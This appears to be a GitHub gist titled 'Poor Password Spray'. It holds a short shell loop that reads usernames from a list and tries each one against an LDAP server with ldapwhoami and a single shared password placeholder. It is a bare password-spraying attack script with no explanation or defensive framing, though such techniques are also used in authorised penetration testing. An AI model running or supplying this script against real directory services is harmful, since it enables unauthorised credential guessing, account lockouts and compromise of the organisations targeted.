Last active
April 3, 2023 19:43
-
-
Save whoo/7dfaf46acab34aa6c7abd35215a828c1 to your computer and use it in GitHub Desktop.
Poor Password Spray
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cat list.txt | while read a | |
do | |
ldapwhoami -vvv -h 1... -D "[email protected]" -w '__PASSWORD__' | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment